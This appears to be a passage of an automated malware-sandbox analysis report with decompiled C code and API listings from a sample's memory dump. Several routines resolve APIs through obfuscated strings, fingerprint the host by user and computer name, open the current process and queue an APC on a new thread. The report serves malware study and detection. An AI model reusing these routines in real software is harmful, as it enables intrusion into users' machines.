0x03c47b99
0x03c47ba0
0x03c47ba7
0x03c47bab
0x03c47bb1
0x03c47bb8
0x03c47bbd
0x03c47bcf
0x03c47bd3
0x03c47bd7
0x03c47bdd
0x03c47be2
0x03c47bf2
0x03c47bf4
0x03c47c0b
0x03c47c0f
0x03c47c12
0x03c47c17
0x03c47c17
0x03c47c20
0x03c47c24
0x03c47c27
0x03c47c2c
0x03c47c2c
0x03c47c24
0x03c47c2f
0x03c47c2f
0x03c47c3a

APIs

Part of subcall function 03C4A055: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,03C47BA7,253D7325,00000000,00000000,74ECC740,?,?,03C49DA0,?), ref: 03C4A0BC
Part of subcall function 03C4A055: sprintf.NTDLL ref: 03C4A0DD

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,03C49DA0,?,047595B0), ref: 03C47BB8
lstrlen.KERNEL32(?,?,?,03C49DA0,?,047595B0), ref: 03C47BC0

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

strcpy.NTDLL ref: 03C47BD7
lstrcat.KERNEL32(00000000,?), ref: 03C47BE2

Part of subcall function 03C41188: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,03C47BF1,00000000,?,?,?,03C49DA0,?,047595B0), ref: 03C4119F

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,03C49DA0,?,047595B0), ref: 03C47BFF

Part of subcall function 03C4976F: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,03C47C0B,00000000,?,?,03C49DA0,?,047595B0), ref: 03C49779
Part of subcall function 03C4976F: _snprintf.NTDLL ref: 03C497D7

Strings

=, xrefs: 03C47BF9

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 09ae8bbf577a0f1bbc8c339818c57978b4dec77824b603dd085f5c7ab1feabd9
Instruction ID: d69af4576e7ed3d5bee1c0586fb96dd03502756fe14a67c5bad59e02eec3d0de
Opcode Fuzzy Hash: 09ae8bbf577a0f1bbc8c339818c57978b4dec77824b603dd085f5c7ab1feabd9
Instruction Fuzzy Hash: BA11C27F9013257B8722FBB49C88CAFBAADDE4856030A4515F914EF200DF35DD02A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03C4944A, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 03C494A4
SysAllocString.OLEAUT32(0070006F), ref: 03C494B8
SysAllocString.OLEAUT32(00000000), ref: 03C494CA
SysFreeString.OLEAUT32(00000000), ref: 03C49532
SysFreeString.OLEAUT32(00000000), ref: 03C49541
SysFreeString.OLEAUT32(00000000), ref: 03C4954C

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 28d3e8f07821b46bca11d29da798246f23322bbbdec2b7efa436b4aa397cb6f2
Instruction ID: 094088a1746af8e809db09815679971fe1ce16b58d0dbacfa9f52c6d9f04a1d0
Opcode Fuzzy Hash: 28d3e8f07821b46bca11d29da798246f23322bbbdec2b7efa436b4aa397cb6f2
Instruction Fuzzy Hash: 8B415135900609AFDB01EFFCD84469FB7B9AF49310F154565E914EB220DB71DE05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03C44944, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C44944(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E03C41525(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x3c4d2a8; // 0xb0a5a8
					_t1 = _t23 + 0x3c4e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x3c4d2a8; // 0xb0a5a8
					_t2 = _t26 + 0x3c4e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E03C48B22(_t54);
					} else {
						_t30 =  *0x3c4d2a8; // 0xb0a5a8
						_t5 = _t30 + 0x3c4e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x3c4d2a8; // 0xb0a5a8
							_t7 = _t33 + 0x3c4e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x3c4d2a8; // 0xb0a5a8
								_t9 = _t36 + 0x3c4e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x3c4d2a8; // 0xb0a5a8
									_t11 = _t39 + 0x3c4e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E03C45CD1(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x03c44953
0x03c44957
0x03c44a19
0x03c4495d
0x03c4495d
0x03c44962
0x03c44975
0x03c44977
0x03c4497c
0x03c44984
0x03c4498b
0x03c4498d
0x03c44992
0x03c44a11
0x03c44a12
0x03c44994
0x03c44994
0x03c44999
0x03c449a1
0x03c449a3
0x03c449a8
0x00000000
0x03c449aa
0x03c449aa
0x03c449af
0x03c449b7
0x03c449b9
0x03c449be
0x00000000
0x03c449c0
0x03c449c0
0x03c449c5
0x03c449cd
0x03c449cf
0x03c449d4
0x00000000
0x03c449d6
0x03c449d6
0x03c449db
0x03c449e3
0x03c449e5
0x03c449ea
0x00000000
0x03c449ec
0x03c449f2
0x03c449f7
0x03c449fe
0x03c44a03
0x03c44a08
0x00000000
0x03c44a0a
0x03c44a0d
0x03c44a0d
0x03c44a08
0x03c449ea
0x03c449d4
0x03c449be
0x03c449a8
0x03c44992
0x03c44a27

APIs

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,03C434A1,?,00000001,?,?,00000000,00000000), ref: 03C44969
GetProcAddress.KERNEL32(00000000,7243775A), ref: 03C4498B
GetProcAddress.KERNEL32(00000000,614D775A), ref: 03C449A1
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03C449B7
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03C449CD
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03C449E3

Part of subcall function 03C45CD1: memset.NTDLL ref: 03C45D50

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 18c0ef25de8f81a961a156a43dbbeead57fe4d415c24ff799d756d99f0e9462b
Instruction ID: 43c76b1fdfac7b5ff7a6d8135a56b1442a9025ca615c1527033228c54e84e74e
Opcode Fuzzy Hash: 18c0ef25de8f81a961a156a43dbbeead57fe4d415c24ff799d756d99f0e9462b
Instruction Fuzzy Hash: 0C216DB560070AEFD720EF6ADC48E5AF7ECEF083007164566E905DB222E770EE058B64

Uniqueness

Uniqueness Score: -1.00%

Function 03C44B2A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E03C44B2A(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x3c4d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E03C47B3B( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E03C48C52(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E03C48B22(_a8);
						goto L29;
					}
					_t64 =  *0x3c4d278; // 0x4759c18
					_t16 = _t64 + 0xc; // 0x4759d3a
					_t65 = E03C47B3B(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d03c4c0
						if(E03C4A38F(_t97,  *_t33, _t91, _a8,  *0x3c4d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x3c4d2a8; // 0xb0a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x3c4ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x3c4e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E03C48F85(_t69,  *0x3c4d334,  *0x3c4d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x3c4d2a8; // 0xb0a5a8
									_t44 = _t71 + 0x3c4e846; // 0x74666f53
									_t73 = E03C47B3B(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d03c4c0
										E03C44538( *_t47, _t91, _a8,  *0x3c4d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d03c4c0
										E03C44538( *_t49, _t91, _t99,  *0x3c4d330, _a16);
										E03C48B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d03c4c0
									E03C44538( *_t40, _t91, _a8,  *0x3c4d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d03c4c0
									E03C44538( *_t43, _t91, _a8,  *0x3c4d330, _a16);
								}
								if( *_t101 != 0) {
									E03C48B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d03c4c0
					_t81 = E03C47DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d03c4c0
							E03C4A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E03C48B22(_t100);
						_t98 = _a16;
					}
					E03C48B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E03C4A789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x3c4d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x03c44b2a
0x03c44b33
0x03c44b3a
0x03c44b3f
0x03c44bac
0x03c44bb2
0x03c44bb7
0x03c44bbe
0x03c44bc3
0x03c44bc8
0x03c44d33
0x03c44d3a
0x03c44d3a
0x03c44d3f
0x03c44d41
0x03c44d41
0x03c44d4a
0x03c44d4a
0x03c44bce
0x03c44bda
0x03c44d29
0x03c44d2c
0x00000000
0x03c44d2c
0x03c44be0
0x03c44be5
0x03c44be8
0x03c44bed
0x03c44bf2
0x03c44c3b
0x03c44c3b
0x03c44c4e
0x03c44c58
0x03c44c5e
0x03c44c65
0x03c44c6f
0x03c44c6f
0x03c44c67
0x03c44c67
0x03c44c67
0x03c44c67
0x03c44c91
0x03c44c99
0x03c44cc7
0x03c44ccc
0x03c44cd3
0x03c44cd8
0x03c44cdc
0x03c44d0e
0x03c44cde
0x03c44ceb
0x03c44cee
0x03c44cfe
0x03c44d01
0x03c44d07
0x03c44d07
0x03c44c9b
0x03c44ca8
0x03c44cab
0x03c44cbd
0x03c44cc0
0x03c44cc0
0x03c44d18
0x03c44d24
0x03c44d1a
0x03c44d1d
0x03c44d1d
0x03c44d18
0x03c44c91
0x00000000
0x03c44c58
0x03c44c01
0x03c44c04
0x03c44c0b
0x03c44c11
0x03c44c14
0x03c44c16
0x03c44c22
0x03c44c25
0x03c44c25
0x03c44c2b
0x03c44c30
0x03c44c30
0x03c44c36
0x00000000
0x03c44c36
0x03c44b44
0x00000000
0x03c44b6b
0x03c44b6b
0x03c44b77
0x03c44b8a
0x03c44b90
0x03c44b98
0x00000000
0x03c44b98

APIs

StrChrA.SHLWAPI(03C49900,0000005F,00000000,00000000,00000104), ref: 03C44B5D
lstrcpy.KERNEL32(?,?), ref: 03C44B8A

Part of subcall function 03C47B3B: lstrlen.KERNEL32(?,00000000,04759C18,00000000,03C45142,04759E3B,?,?,?,?,?,69B25F44,00000005,03C4D00C), ref: 03C47B42
Part of subcall function 03C47B3B: mbstowcs.NTDLL ref: 03C47B6B
Part of subcall function 03C47B3B: memset.NTDLL ref: 03C47B7D

Part of subcall function 03C44538: lstrlenW.KERNEL32(?,?,?,03C44CF3,3D03C4C0,80000002,03C49900,03C45C8D,74666F53,4D4C4B48,03C45C8D,?,3D03C4C0,80000002,03C49900,?), ref: 03C4455D

Part of subcall function 03C48B22: RtlFreeHeap.NTDLL(00000000,00000000,03C4131A,00000000,?,?,00000000), ref: 03C48B2E

lstrcpy.KERNEL32(?,00000000), ref: 03C44BAC

Strings

\, xrefs: 03C44B90
(, xrefs: 03C44C0D

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: c13501a5d48ce0ed4d95fb3ede9ee6ee3f1280d5fe96a5b2f789379cc0f18148
Instruction ID: 54132e7586acd43254cf46b671e43124ad996bb2f460654c7deeed5328c11a91
Opcode Fuzzy Hash: c13501a5d48ce0ed4d95fb3ede9ee6ee3f1280d5fe96a5b2f789379cc0f18148
Instruction Fuzzy Hash: 3A514C79500209EFDF25EFA1DD44FAA7BBAFF04200F268554F912DA164EB31DA25AB10

Uniqueness

Uniqueness Score: -1.00%

Function 0042A73E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042A7B2
__aullrem.LIBCMT ref: 0042A97F
__aulldiv.LIBCMT ref: 0042A9A1

Strings

0, xrefs: 0042A76D
9, xrefs: 0042A9B2

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
Instruction ID: a86bfc104ab8e5c4d7c76c3574715060e7fdbee6b4cf33be2445bf1eecda68b4
Opcode Fuzzy Hash: be6e887e12e853b3a474f5b4eec608737560e6f0e8a9116a0579e6938cc35f91
Instruction Fuzzy Hash: 8A4115B1E05628DFDB24CF49D889BAEB7B1BF84304F5085DAD849A7240C3389E95CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0042C393, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042C3FA
__aullrem.LIBCMT ref: 0042C5CA
__aulldiv.LIBCMT ref: 0042C5EC

Strings

9, xrefs: 0042C5FD
', xrefs: 0042C393

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
Instruction ID: 547c948c94115b27dd2cb8837f87f6ddd788749979dff36bd87c5c4546aa4fde
Opcode Fuzzy Hash: dcdeadc3c3ff2a0e65cecbf096a6997c6b24477cf50909c6d89c3f9eeba8a92f
Instruction Fuzzy Hash: A14115B1E00139AFDB24CF48D881BAEB7B5FF85314F5045AAE149A7241C778AE81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 03C49267, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C49267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E03C41525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E03C48B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x3c49cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x03c49275
0x03c49278
0x03c4927b
0x03c49281
0x03c49286
0x03c4928c
0x03c49294
0x03c49297
0x03c4929d
0x03c492a2
0x03c492af
0x03c492bc
0x03c492c0
0x03c492c2
0x03c492c6
0x03c492c9
0x03c492d9
0x03c4932c
0x03c4932d
0x03c492db
0x03c492e0
0x03c492e1
0x03c492e6
0x03c492e9
0x03c492fc
0x00000000
0x03c492fe
0x03c49301
0x03c49306
0x03c49314
0x03c49317
0x03c4931d
0x03c49322
0x00000000
0x03c49324
0x03c49324
0x03c49327
0x03c49327
0x03c49322
0x03c492fc
0x03c49332
0x03c49333
0x03c492a2
0x03c49339

APIs

GetUserNameW.ADVAPI32(00000000,03C49CB0), ref: 03C4927B
GetComputerNameW.KERNEL32(00000000,03C49CB0), ref: 03C49297

Part of subcall function 03C41525: RtlAllocateHeap.NTDLL(00000000,00000000,03C41278), ref: 03C41531

GetUserNameW.ADVAPI32(00000000,03C49CB0), ref: 03C492D1
GetComputerNameW.KERNEL32(03C49CB0,?), ref: 03C492F4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,03C49CB0,00000000,03C49CB2,00000000,00000000,?,?,03C49CB0), ref: 03C49317

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: e261c835824fd769610bca2a6065cc35978bf03959070932257f16e5c2af168d
Instruction ID: 98790eabf677174a12470447d7320f9b8280b20c1bf6f93fc086aee8b5952564
Opcode Fuzzy Hash: e261c835824fd769610bca2a6065cc35978bf03959070932257f16e5c2af168d
Instruction Fuzzy Hash: FD21E876900218FFCB11DFE9D988DEEBBB8EF45204B5444AAE502E7240E7309B45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 01FE2072, Relevance: 7.6, APIs: 5, Instructions: 81filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,01FE168D,0000000A,?,?), ref: 01FE207F
CreateFileMappingW.KERNEL32(000000FF,00403108,00000004,00000000,?,?,?,?,54D38000,00000192), ref: 01FE20DF
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,01FE168D,0000000A), ref: 01FE210A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01FE168D,0000000A,?,?), ref: 01FE212B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,01FE168D,0000000A,?,?), ref: 01FE2133

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: File$Time$CloseCreateErrorHandleLastMappingSystemView
String ID:
API String ID: 2685682793-0
Opcode ID: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction ID: c24354249ee7d2b1c626ff3b6ee518c02adaff9b307240c27a5446a3a9babb4e
Opcode Fuzzy Hash: fca7e80b9ba9561c9709ad2fe4079cad74267bb47c00cdbe9b3e782023aa4d13
Instruction Fuzzy Hash: C121A4B6900104BFD715AFA8DDC8EAE7BEDEB58250F114035F705E6190E6B59A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03C49EBB, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03C49EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x3c4d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x3c4d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x3c4d258 = _t6;
					 *0x3c4d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x3c4d254 = _t7;
					if(_t7 == 0) {
						 *0x3c4d254 =  *0x3c4d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x03c49ec3
0x03c49ec9
0x03c49ed0
0x00000000
0x03c49f2a
0x03c49ed2
0x03c49eda
0x03c49ee7
0x03c49ee7
0x03c49f27
0x00000000
0x03c49f27
0x03c49ee9
0x03c49ee9
0x03c49eee
0x03c49f00
0x03c49f05
0x03c49f0b
0x03c49f11
0x03c49f18
0x03c49f1a
0x03c49f1a
0x00000000
0x03c49f21
0x03c49ee3
0x00000000
0x00000000
0x03c49ee5
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,03C427C3,?,?,00000001,?,?,?,03C47F25,?), ref: 03C49EC3
GetVersion.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C49ED2
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C49EEE
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,03C47F25,?), ref: 03C49F0B
GetLastError.KERNEL32(?,00000001,?,?,?,03C47F25,?), ref: 03C49F2A

Memory Dump Source

Source File: 00000000.00000002.517980109.0000000003C41000.00000020.00020000.sdmp, Offset: 03C40000, based on PE: true

Associated: 00000000.00000002.517970784.0000000003C40000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.517994997.0000000003C4C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.518001499.0000000003C4D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.518009139.0000000003C4F000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 94bf0f4cdd46b99c42ad9da5fb9d8402f70d9201b2ecbafe4596337baf7709f7
Instruction ID: 4d4705c00373da29e1f623ac6eb6bb7cae163447c0475fdf145453fa2af77e6e
Opcode Fuzzy Hash: 94bf0f4cdd46b99c42ad9da5fb9d8402f70d9201b2ecbafe4596337baf7709f7
Instruction Fuzzy Hash: 6BF0C278651312ABE730FF64AC2DF163BA0A780711F04451AFA43CA1D9E775ED01CB19

Uniqueness

Uniqueness Score: -1.00%

Function 01FE1F88, Relevance: 7.5, APIs: 5, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 01FE1F92
GetModuleHandleA.KERNEL32(00000000), ref: 01FE1FA2
GetCommandLineW.KERNEL32 ref: 01FE1FAD

Part of subcall function 01FE1BF0: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 01FE1C2F
Part of subcall function 01FE1BF0: Sleep.KERNEL32(00000000,00000030), ref: 01FE1C76
Part of subcall function 01FE1BF0: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 01FE1CED
Part of subcall function 01FE1BF0: QueueUserAPC.KERNEL32(004013C4,00000000,?), ref: 01FE1D09

HeapDestroy.KERNEL32 ref: 01FE1FC0
ExitProcess.KERNEL32 ref: 01FE1FC7

Memory Dump Source

Source File: 00000000.00000002.517164137.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FE0000, based on PE: false

Similarity

API ID: CreateHeap$CommandDestroyExitHandleInformationLineModuleProcessQueryQueueSleepSystemThreadUser
String ID:
API String ID: 1891506779-0
Opcode ID: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction ID: 922c0e39d55a0c8a5cfaf2a1158953d1d4e816399daf8b7a9605fafe040f3c18
Opcode Fuzzy Hash: 0d0ac4a0cb8a711b3e847264792f8c917a209596f5dc776f2b7e58a96ff77181
Instruction Fuzzy Hash: 52E0B6309063209BC7212F71AF0CB4E3EA8BF057927044535F606B22B4DBB54501DAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00427454, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004274B3
_memset.LIBCMT ref: 0042753C
__invalid_parameter.LIBCMTD ref: 0042759B

Strings

P, xrefs: 004275B0

Memory Dump Source

Source File: 00000000.00000002.516842254.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Similarity

API ID: _memset$__invalid_parameter
String ID: P
API String ID: 2178901135-3110715001
Opcode ID: 36afb094fbf91bde458c9f04504b5550f94f71234a4dc47069f13a2b3c191332
Instruction ID: 9f4333b1c93b4f5297eb4471f37465e6d2c3a174d24442939a46d1f1890aaca4
